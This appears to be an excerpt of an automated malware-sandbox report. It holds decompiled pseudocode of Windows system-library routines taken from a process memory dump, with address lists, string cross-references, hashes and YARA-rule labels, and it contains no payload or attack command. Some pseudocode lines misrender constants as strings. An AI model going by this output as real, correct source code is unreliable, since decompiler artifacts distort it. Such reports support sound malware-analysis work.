								_t109 = 0x1485;
								E00F97016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E00F59830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E00F969A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1007c04 != 0) {
						_t118 = _v12;
						_t120 = E00F9A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1007bd8;
						if( *0x1007bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E00F595D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push("RegLoadRegistryInfo");
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E00F599A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E00F93540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E00F1B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E00F5AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1008474 - 3;
										if( *0x1008474 != 3) {
											 *0x10079dc =  *0x10079dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E00F37D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E00F37D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E00F97016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1008708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1007b00; // 0x0
							asm("ror esi, cl");
							 *0x100b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E00F595D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E00F27F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x00f403f1
0x00f403f7
0x00f403f9
0x00f403fb
0x00f403fd
0x00f40400
0x00f4040a
0x00f84c7a
0x00f40537
0x00f40547
0x00f40410
0x00f40410
0x00f40414
0x00f40417
0x00f4041a
0x00f40421
0x00f40424
0x00f4042b
0x00f4043b
0x00f4043e
0x00f4043f
0x00f4043f
0x00f40446
0x00f40449
0x00f4044c
0x00f4044f
0x00f40459
0x00f84c8d
0x00f4045f
0x00f4045f
0x00f4045f
0x00f40467
0x00f84c97
0x00f84c9d
0x00f84ca4
0x00f84caa
0x00f84caf
0x00f84cb1
0x00f84cc3
0x00f84cb3
0x00f84cbc
0x00f84cbc
0x00f84cc8
0x00f84ccb
0x00f84cd7
0x00f84cda
0x00f84cdf
0x00f84cdf
0x00f84ccb
0x00f84ca4
0x00f4046d
0x00f4046f
0x00f4046f
0x00f40471
0x00f40476
0x00f4047a
0x00f4047b
0x00f40483
0x00f40489
0x00f4048d
0x00000000
0x00000000
0x00f84ce9
0x00f84cef
0x00f84d22
0x00f84d22
0x00000000
0x00f84d22
0x00f84cf1
0x00f84cf7
0x00000000
0x00000000
0x00f84cf9
0x00f84cff
0x00000000
0x00000000
0x00f84d05
0x00f84d07
0x00000000
0x00000000
0x00f84d0d
0x00f84d0f
0x00f84d14
0x00f84d16
0x00000000
0x00000000
0x00f84d1c
0x00f84d1c
0x00f40499
0x00f40535
0x00f40535
0x00000000
0x00f40535
0x00f404a6
0x00f84d2c
0x00f84d37
0x00f84d39
0x00f84d3b
0x00000000
0x00000000
0x00f84d41
0x00f84d48
0x00f40527
0x00f4052b
0x00f4052d
0x00f40530
0x00f40530
0x00000000
0x00f4052b
0x00f84d4e
0x00f404ac
0x00f404ac
0x00f404af
0x00f404b2
0x00f404b7
0x00f404b9
0x00f404bb
0x00f404bd
0x00f404bf
0x00f404c5
0x00f404c9
0x00f84d53
0x00f84d59
0x00f84db9
0x00f84dba
0x00f84dbf
0x00f84dc2
0x00f84dc4
0x00f84dc7
0x00f84dce
0x00000000
0x00f84dce
0x00f84d5b
0x00f84d61
0x00000000
0x00000000
0x00f84d63
0x00f84d69
0x00000000
0x00000000
0x00f84d6b
0x00f84d6e
0x00f84d74
0x00f84d76
0x00f84d7c
0x00f84d7e
0x00f84d84
0x00f84d89
0x00f84d8c
0x00f84d8d
0x00f84d92
0x00f84d95
0x00f84d96
0x00f84d98
0x00f84d9a
0x00f84d9f
0x00f84da4
0x00f84da6
0x00f84da8
0x00f84daf
0x00f84db1
0x00f84db1
0x00f84daf
0x00f84da6
0x00f84d84
0x00f84d7c
0x00000000
0x00f84d74
0x00f404d6
0x00f84de1
0x00f404dc
0x00f404dc
0x00f404dc
0x00f404e4
0x00f84deb
0x00f84df1
0x00f84df8
0x00f84dfe
0x00f84e03
0x00f84e05
0x00f84e17
0x00f84e07
0x00f84e10
0x00f84e10
0x00f84e1c
0x00f84e1f
0x00f84e35
0x00f84e35
0x00f84e1f
0x00f84df8
0x00f404f1
0x00f404fa
0x00f84e3f
0x00f84e47
0x00f84e5b
0x00f84e61
0x00f84e67
0x00f84e69
0x00f84e71
0x00f84e73
0x00f40500
0x00f40500
0x00f40500
0x00f404fa
0x00f40508
0x00f4051d
0x00f4051d
0x00f4051f
0x00f40524
0x00000000
0x00f40524
0x00f40515
0x00f40517
0x00f84e7a
0x00f84e7c
0x00000000
0x00000000
0x00f84e85
0x00000000
0x00f84e85
0x00000000
0x00f40517

Strings

RegLoadRegistryInfo, xrefs: 00F404B2

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: RegLoadRegistryInfo
API String ID: 0-282410176
Opcode ID: c56f1d9cc1819a6387d0c6093001b13da98317a3055b7efb4062a6e98ea36df2
Instruction ID: 9e3edee220b784d99cd026d8322c951a30883c4b6bea57e4b8c2cb9f73793c44
Opcode Fuzzy Hash: c56f1d9cc1819a6387d0c6093001b13da98317a3055b7efb4062a6e98ea36df2
Instruction Fuzzy Hash: B6910A32E042159FEB31EB68CC45BAD7BA4EB01734F150265FE50A72E1DB78AD40EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F96DC9, Relevance: 1.4, Strings: 1, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00F96DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E00F96B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E00F37D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E00F59AE0();
					_t87 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E00F9795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E00F9795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E00F9795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E00F9795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L00F34620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E00F96B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E00F96B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E00F96B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E00F96B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E00F37D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E00F59AE0();
								L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L00F32400( &_v36);
							if(_v24 >= 0) {
								_t87 = L00F32400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L00F32400( &_v52);
							}
							if(_v28 >= 0) {
								return L00F32400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x00f96dd4
0x00f96dde
0x00f96de1
0x00f96de3
0x00f96de6
0x00f96de9
0x00f96dec
0x00f96def
0x00f96df2
0x00f96df5
0x00f96dfe
0x00f96e04
0x00f96e09
0x00f96e0d
0x00f96e18
0x00f96e1b
0x00f96e22
0x00f96e2d
0x00f96e30
0x00f96e36
0x00f96e42
0x00f96e4d
0x00f96e50
0x00f96e55
0x00f96e5c
0x00f96e6e
0x00f96e5e
0x00f96e67
0x00f96e67
0x00f96e73
0x00f96e74
0x00f96e77
0x00f96e7c
0x00f96e7d
0x00f96e8e
0x00f96e93
0x00f96e9c
0x00f96ea8
0x00f96eab
0x00f96eac
0x00f96eb3
0x00f96ecd
0x00f96edc
0x00f96ee2
0x00f96ee5
0x00f96ef2
0x00f96efb
0x00f96f01
0x00f96f06
0x00f96f0b
0x00f96f11
0x00f96f1a
0x00f96f22
0x00f96f26
0x00f96f26
0x00f96f33
0x00f96f41
0x00f96f44
0x00f96f47
0x00f96f54
0x00f96f65
0x00f96f77
0x00f96f7c
0x00f96f82
0x00f96f91
0x00f96f99
0x00f96fa3
0x00f96fae
0x00f96fae
0x00f96fba
0x00f96fbb
0x00f96fbc
0x00f96fc1
0x00f96fc2
0x00f96fd3
0x00f96fd8
0x00f96fd8
0x00f96fdf
0x00f96fe8
0x00f96fee
0x00f96fee
0x00f96ff5
0x00f96ffb
0x00f96ffb
0x00f97004
0x00000000
0x00f9700a
0x00f97004
0x00f96eb3
0x00f96e9c
0x00f97015

Strings

RegLoadRegistryInfo, xrefs: 00F96ED3, 00F97009

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: RegLoadRegistryInfo
API String ID: 0-282410176
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: e9d18f548854c4b9ac8e82497e36100fd3702cba95adae7020709291d06f5d7f
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: C4717F71E00619EFDF10EFA5C985AEEBBB9FF48710F104069E505E7251DB34AA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FE0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00FE0EA5(void* __ecx, intOrPtr __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				intOrPtr _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E00FDFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00FE1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00F59730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00FDA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00FDA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1008b04 >> 0x14) + (_v44 -  *0x1008b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00F37D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00FD138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00F37D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00FCFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1008724 & 0x00000008) != 0) {
						E00FD52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00FE15B5(0x1008ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x00fe0eb7
0x00fe0eb9
0x00fe0ec0
0x00fe0ec2
0x00fe0ecd
0x00fe105b
0x00fe105b
0x00fe1061
0x00fe1066
0x00fe1066
0x00fe106b
0x00fe1073
0x00fe1073
0x00fe0ed3
0x00fe0ed6
0x00fe0edc
0x00fe0ee0
0x00fe0ee7
0x00fe0ef0
0x00fe0ef5
0x00fe0efa
0x00fe0efc
0x00fe0efd
0x00fe0f03
0x00fe0f04
0x00fe0f06
0x00fe0f07
0x00fe0f09
0x00fe0f0e
0x00fe0f14
0x00fe0f23
0x00fe0f2d
0x00fe0f34
0x00fe0f34
0x00fe0f14
0x00fe0f52
0x00000000
0x00000000
0x00fe0f58
0x00fe0f73
0x00fe0f74
0x00fe0f79
0x00fe0f7d
0x00fe0f80
0x00fe0f86
0x00fe0fab
0x00fe0fb5
0x00fe0fc6
0x00fe0fd1
0x00fe0fe3
0x00fe0fd3
0x00fe0fdc
0x00fe0fdc
0x00fe0feb
0x00fe1009
0x00fe1009
0x00fe1015
0x00fe1027
0x00fe1017
0x00fe1020
0x00fe1020
0x00fe102f
0x00fe103c
0x00fe103c
0x00fe1048
0x00fe1050
0x00fe1050
0x00fe1055
0x00000000
0x00fe1055
0x00fe0f88
0x00fe0f9e
0x00fe0fa2
0x00fe0fa9
0x00000000
0x00000000
0x00000000
0x00fe0fa9
0x00000000

Strings

`, xrefs: 00FE0F16

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 6b0c9a12a9ee802327d8203e6ab686f11d4e0317b65080e0a3d992c55e75fe5c
Instruction ID: d9c50f1a6200eb44a62466f9a640c67bd6a00c1f479934d9907eb942e9fe83e5
Opcode Fuzzy Hash: 6b0c9a12a9ee802327d8203e6ab686f11d4e0317b65080e0a3d992c55e75fe5c
Instruction Fuzzy Hash: 2051CE712043829FD325DF2AD881B1BB7E5FBC4314F04092DFA8687291DB75E845DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FDAE44, Relevance: 1.4, Strings: 1, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00FDAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E00FDC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E00FDACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & "RegLoadRegistryInfo") != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E00FDFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E00FDEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E00F37D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E00FD1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E00FE1536(0x1008ae4, (_t74 -  *0x1008b04 >> 0x14) + (_t74 -  *0x1008b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L00FDC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E00FDA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E00FBCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E00FDACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x00fdae44
0x00fdae4c
0x00fdae53
0x00fdae55
0x00fdae5c
0x00fdae64
0x00fdae68
0x00fdae75
0x00fdae75
0x00fdae78
0x00fdae7a
0x00fdae7c
0x00fdae7f
0x00fdaea8
0x00fdaeab
0x00fdaead
0x00000000
0x00000000
0x00fdaeb3
0x00fdaeb8
0x00fdaebb
0x00fdaebd
0x00000000
0x00fdae81
0x00fdae88
0x00fdae8f
0x00fdae9b
0x00fdae96
0x00fdae96
0x00fdae96
0x00fdaea0
0x00fdaea3
0x00fdaebf
0x00fdaebf
0x00fdaec3
0x00fdaec9
0x00fdaf0d
0x00fdaf14
0x00fdaf3d
0x00fdaf3d
0x00fdaf41
0x00fdaf44
0x00fdaf67
0x00fdaf67
0x00fdaf6a
0x00fdafca
0x00fdafd1
0x00000000
0x00fdafd1
0x00fdaf6c
0x00fdaf6d
0x00fdaf75
0x00fdaf7c
0x00fdaf7e
0x00fdaf80
0x00fdaf85
0x00fdaf87
0x00fdaf99
0x00fdaf89
0x00fdaf92
0x00fdaf92
0x00fdaf9e
0x00fdafa1
0x00fdafa3
0x00fdafa9
0x00fdafb0
0x00fdafb2
0x00fdafb4
0x00fdafbc
0x00fdafbc
0x00fdafb4
0x00fdafb0
0x00000000
0x00fdafa1
0x00fdaf4f
0x00fdaf57
0x00fdaf5c
0x00fdaf5e
0x00000000
0x00000000
0x00fdaf60
0x00fdaf64
0x00fdaf64
0x00000000
0x00fdaf64
0x00fdaf1a
0x00fdaf25
0x00000000
0x00000000
0x00fdaf27
0x00fdaf28
0x00fdaf33
0x00000000
0x00fdaed0
0x00fdaed0
0x00fdaed2
0x00fdaee1
0x00fdaee4
0x00000000
0x00000000
0x00fdaee6
0x00fdaeec
0x00000000
0x00000000
0x00fdaefb
0x00fdaf07
0x00fdafd3
0x00fdafdb
0x00fdafdb
0x00000000
0x00fdaf07
0x00fdaed6
0x00fdaed8
0x00fdaedf
0x00000000
0x00000000
0x00000000
0x00fdaedf
0x00fdaec9

Strings

RegLoadRegistryInfo, xrefs: 00FDAEC3

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: RegLoadRegistryInfo
API String ID: 0-282410176
Opcode ID: 6b30ede5893ce8fe122551b7895f00ed30e2c517851da43ef7ffb018990bd387
Instruction ID: 603265c6d76cde499d4a22fc080cf048e747717d8934e80c158d3669e3702a6a
Opcode Fuzzy Hash: 6b30ede5893ce8fe122551b7895f00ed30e2c517851da43ef7ffb018990bd387
Instruction Fuzzy Hash: 2341E772B006115BD7269B26C885B7BB39BAF84730F1C425BF85687391D738DC01F69A

Uniqueness

Uniqueness Score: -1.00%

Function 00F2EF40, Relevance: 1.4, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00F2EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E00F19080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & "iRegLoadRegistryInfo";
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x779cc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E00F12D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & "iRegLoadRegistryInfo" ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
